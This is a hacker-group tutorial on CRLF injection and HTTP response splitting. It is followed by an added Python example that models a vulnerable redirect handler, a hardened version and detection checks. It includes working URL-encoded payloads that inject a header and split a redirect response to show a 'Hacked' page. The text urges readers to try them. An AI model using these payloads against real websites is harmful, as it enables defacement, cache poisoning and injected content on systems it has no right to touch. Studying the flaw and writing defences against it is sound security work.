CRLF Injection
---------------------------------------
Presented by: Gurender Singh, code name Un_N0n Antil0g >> Team Indi HeX (Admin) >> Indian Cyber Police (Core Member)
Biography of Author
Gurender Singh, A.K.A. Un_N0n Antil0g, is a learner and independent IT security researcher, currently working with Team Indi HeX and ICP, helping new people in the field of hacking and security. He is Admin of Team Indi HeX, and Admin of Indian Cyber Police with Nipun Jaswal, Chetan Soni and COde InjectOr. Gurender and his team have hacked and patched many servers, and have helped many admins restore their servers.
BRIEF INTRODUCTION
CRLF Injection is a web application vulnerability that occurs when user-entered data is passed directly into response header fields (Location, Set-Cookie, etc.) without proper sanitisation. It can lead to various forms of security exploits, ranging from XSS and cache poisoning to cache-based defacement and page injection.
WHAT IS CRLF ?
CR (Carriage Return) and LF (Line Feed) are non-printable characters that indicate end-of-line. >> For example: if you type anything in a text editor and press Enter, the CR and LF characters are automatically inserted at the end of the line. In the ASCII table, CR has the decimal value 13 and LF has the decimal value 10. They are also commonly written as \r\n.
HTTP HEADER
HTTP headers are part of the request the browser sends to the server and of the response the server returns with the requested web page. In other words, the browser sends a request to the server, the server sends back a response, and the browser reads that response and displays the web page. The first page that opens in the web browser is the homepage of the website, for example www.abc.com. To understand it better, I will show you the request the browser makes and the response it receives from the server.
[#] ~ Browsers Request.
--------------------------------------------------
GET / HTTP/1.1[CRLF]
Host: www.abc.com[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

[#] ~ Servers Response.
--------------------------------------------------
HTTP/1.1 200 OK[CRLF]
Date: Wed, 24 Aug 2011 17:48:46 GMT[CRLF]
Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
X-Powered-By: PHP/5.0.2[CRLF]
Keep-Alive: timeout=15, max=100[CRLF]
Connection: Keep-Alive[CRLF]
Transfer-Encoding: chunked[CRLF]
Content-Type: text/html[CRLF][CRLF]

[#] ~ WEBPAGE DISPLAYED.
--------------------------------------------------
<HTML>
<HEAD><TITLE> Welcome to ABC.com </TITLE></HEAD>
<BODY>
<CENTER> Welcome to ABC.com </CENTER>
</BODY>
</HTML>
---------------------------------------------------
As shown above, the browser sends a request to the server, the server reads that request and responds to it, and the browser interprets the server's response and displays the web page.
REDIRECTION
Almost every website has redirections. A redirection is a process in which a particular web page sends the current page on to another web page after some time (depending on the meta refresh or JavaScript used). >> Let's take an example and understand it. Suppose the website abc.com redirects to xyz.com. The code present would be something like this:
<HTML>
<HEAD>
<TITLE> Welcome to Example.com</TITLE>
<META HTTP-EQUIV='Refresh' CONTENT='5; URL=http://www.ABC.com/redir.php?url=http://www.XYZ.com'>
</HEAD>
<BODY>
<center><b>Welcome to ABC.com </b><br><br><br><br>
<font color='red' size='4'>Please wait a few seconds while we redirect you to the main page</font></center>
</BODY>
</HTML>
[#] ~ HEADER VIEW OF REDIRECTION.
--------------------------------------------------
[#] ~ Browsers Request.
GET /redir.php?url=http://www.XYZ.com HTTP/1.1[CRLF]
Host: www.ABC.com[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

[#] ~ Servers Response.
HTTP/1.1 302 Found[CRLF]
Date: Tue, 23 Aug 2011 17:52:17 GMT[CRLF]
Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
X-Powered-By: PHP/5.0.2[CRLF]
Location: http://www.XYZ.com[CRLF] (User input in Location)
Keep-Alive: timeout=15, max=99[CRLF]
Connection: Keep-Alive[CRLF]
Transfer-Encoding: chunked[CRLF]
Content-Type: text/html[CRLF][CRLF]

[#] ~ Browsers Request (following the redirect).
GET / HTTP/1.1[CRLF]
Host: www.XYZ.com[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]
---------------------------------------------------
The server of www.XYZ.com responds with HTTP 200 OK and displays the content of homepage of XYZ.com.
CRLF INJECTION.
So, we have learned about HTTP headers and redirection. As we can observe, the data coming from the user (the url parameter) ends up in the Location header, so it can be modified. So what the hell are you waiting for? :P Modify it. Let us take one example. Notice %0d%0a in the following request (CR is 0D in hex and LF is 0A in hex):
[#] ~ Browsers Request.
--------------------------------------------------
GET /redir.php?url=%0D%0ANew_Header:New_Header_Value%0D%0A HTTP/1.1[CRLF]
Host: www.example.com[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

[#] ~ Servers Response.
--------------------------------------------------
HTTP/1.1 302 Found[CRLF]
Date: Tue, 23 Aug 2011 18:34:36 GMT[CRLF]
Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
X-Powered-By: PHP/5.0.2[CRLF]
Location:[CRLF]
New_Header: New_Header_Value[CRLF] (An injected header field, created by the CRLF characters)
Keep-Alive: timeout=15, max=99[CRLF]
Connection: Keep-Alive[CRLF]
Transfer-Encoding: chunked[CRLF]
Content-Type: text/html[CRLF][CRLF]
--------------------------------------------------
As you can see, in the above browser request we injected CRLF characters around the value New_Header:New_Header_Value (%0D%0ANew_Header:New_Header_Value%0D%0A). The server copied the decoded value into the response, so the browser now sees a new header field.
ANOTHER EXAMPLE.
[#] ~ Browsers Request.
--------------------------------------------------
GET /redir.php?url=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Ccenter%3E%3Ch1%3EHacked%3C/h1%3E%3C/center%3E HTTP/1.1[CRLF]
Host: www.ABC.com[CRLF]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0[CRLF]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

[#] ~ Servers Response.
--------------------------------------------------
HTTP/1.1 302 Found[CRLF]
Date: Tue, 23 Aug 2011 18:49:08 GMT[CRLF]
Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
X-Powered-By: PHP/5.0.2[CRLF]
Location:[CRLF]
Content-Type: text/html[CRLF][CRLF]
HTTP/1.1 200 OK[CRLF] (A new response header created using CRLF injection: response splitting)
Content-Type: text/html[CRLF][CRLF]
<center><h1>Hacked</h1></center>[CRLF]
Keep-Alive: timeout=15, max=100[CRLF]
Connection: Keep-Alive[CRLF]
Transfer-Encoding: chunked[CRLF]
Content-Type: text/html[CRLF][CRLF]
--------------------------------------------------
The above shows the creation of a new response using CRLF injection. The entire data in the "url" parameter is again reflected in the response header, but this time it is crafted so that it terminates the headers of the first response and starts a second one (HTTP response splitting). The web page displayed will be something like this: a page showing only the injected "Hacked" heading.
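To make the mechanics concrete from the defender's side, here is an added Python example (not from this book or its author) that models a redir.php-style handler: a version that copies the decoded url parameter straight into Location, a hardened version that refuses control characters before the value reaches a header, and two small checks that reveal the injected header field and the split response. The handler and check names are hypothetical; the two url payloads are the ones shown in the requests above.

```python
from urllib.parse import unquote

CRLF = "\r\n"

# The two url parameter values from the examples above.
HEADER_PAYLOAD = "%0D%0ANew_Header:New_Header_Value%0D%0A"
SPLIT_PAYLOAD = ("%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK"
                 "%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
                 "%3Ccenter%3E%3Ch1%3EHacked%3C/h1%3E%3C/center%3E")

def build_redirect_vulnerable(url_param: str) -> str:
    """Hypothetical redir.php: the decoded url parameter goes straight into
    Location, so a decoded %0d%0a becomes a real line break in the headers."""
    location = unquote(url_param)
    return (f"HTTP/1.1 302 Found{CRLF}Location: {location}{CRLF}"
            f"Content-Type: text/html{CRLF}{CRLF}")

def build_redirect_safe(url_param: str) -> str:
    """Hardened variant: decode, then refuse CR, LF or any other control
    character before the value reaches a header (this is what modern servers
    and frameworks enforce for you)."""
    location = unquote(url_param)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in location):
        raise ValueError("control character in header value")
    return (f"HTTP/1.1 302 Found{CRLF}Location: {location}{CRLF}"
            f"Content-Type: text/html{CRLF}{CRLF}")

def rejects(url_param: str) -> bool:
    """True if the hardened handler refuses this parameter."""
    try:
        build_redirect_safe(url_param)
    except ValueError:
        return True
    return False

def header_names(raw: str) -> list:
    """Field names in the first response's header block; anything other than
    Location and Content-Type was supplied by the user."""
    head = raw.split(CRLF + CRLF, 1)[0]
    return [line.split(":", 1)[0].strip()
            for line in head.split(CRLF)[1:] if ":" in line]

def count_responses(raw: str) -> int:
    """Status lines in the stream: one for a correct redirect, two when the
    response has been split."""
    return sum(1 for line in raw.split(CRLF) if line.startswith("HTTP/1.1 "))
```

Run header_names and count_responses over the output of build_redirect_vulnerable with each payload to see the extra field and the second status line; build_redirect_safe raises on both payloads and passes a plain URL untouched.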
Hope you guys like this book on CRLF injection. I will soon release a video on it that would help you understand this vulnerability in depth.
THANK YOU